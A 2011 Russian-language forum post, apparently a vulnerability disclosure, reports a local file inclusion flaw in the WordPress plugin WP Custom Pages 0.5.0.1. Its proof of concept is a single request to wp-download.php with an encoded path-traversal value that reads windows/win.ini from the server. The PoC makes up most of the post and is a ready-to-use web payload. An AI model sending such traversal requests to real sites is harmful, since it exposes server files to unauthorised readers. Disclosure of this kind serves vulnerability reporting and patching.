
05.04.2011, 17:32
|
|
Новичок
Регистрация: 03.04.2011
Сообщений: 10
С нами:
7952726
Репутация:
0
|
|
LFI
Vulnerable Plugin: WordPress WP Custom Pages 0.5.0.1
Type vulnerable: LFI
Description: Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере.
-=POC=-
Код:
http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-
download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
Author: AutoSec Tools
|
|
|